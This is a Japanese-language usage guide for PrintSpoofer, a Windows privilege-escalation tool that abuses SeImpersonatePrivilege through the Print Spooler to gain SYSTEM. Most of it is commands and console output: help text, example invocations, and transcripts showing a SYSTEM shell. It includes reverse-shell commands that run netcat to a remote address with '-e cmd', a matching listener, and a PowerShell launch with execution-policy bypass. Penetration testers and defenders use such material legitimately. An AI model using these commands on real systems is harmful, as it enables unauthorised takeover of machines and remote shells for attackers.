
なりすまし権限の悪用:「Printer Bug」を通じて
Windows 10 および Server 2016/2019 上で SeImpersonatePrivilege を悪用して LOCAL/NETWORK SERVICE から SYSTEM へ昇格します。
詳細: https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/.
-h オプションを使用してヘルプメッセージを確認できます。
C:\TOOLS>PrintSpoofer.exe -h
PrintSpoofer v0.1 (by @itm4n)
Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()
Arguments:
-c <CMD> Execute the command *CMD*
-i Interact with the new process in the current command prompt (default is non-interactive)
-d <ID> Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
-h That's me :)
Examples:
- Run PowerShell as SYSTEM in the current console
PrintSpoofer.exe -i -c powershell.exe
- Spawn a SYSTEM command prompt on the desktop of the session 1
PrintSpoofer.exe -d 1 -c cmd.exe
- Get a SYSTEM reverse shell
PrintSpoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"
対話型 シェルがある場合、現在のコンソールで新しい SYSTEM プロセスを作成できます。
ユースケース: bind shell、reverse shell、psexec.py など。
C:\TOOLS>PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19613.1000]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
nt authority\system
コマンドを実行できる が対話型シェルがない場合、新しい SYSTEM プロセスを作成して対話せずにすぐに終了できます。
ユースケース: WinRM、WebShell、wmiexec.py、smbexec.py など。
リバースシェルを作成:
C:\TOOLS>PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Netcat リスナー:
C:\TOOLS>nc.exe -l -p 1337
Microsoft Windows [Version 10.0.19613.1000]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
nt authority\system
ローカルまたは RDP 経由でログオンしている場合 (VDI を含む)、デスクトップ上に SYSTEM コマンドプロンプトを生成できます。まず、qwinsta コマンドでセッション ID を確認し、その値を -d オプションで指定します。
ユースケース: ターミナルセッション (RDP)、VDI
C:\TOOLS>qwinsta
SESSIONNAME USERNAME ID STATE TYPE DEVICE
services 0 Disc
console Administrator 1 Active
>rdp-tcp#3 lab-user 3 Active
rdp-tcp 65536 Listen
C:\TOOLS>PrintSpoofer.exe -d 3 -c "powershell -ep bypass"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK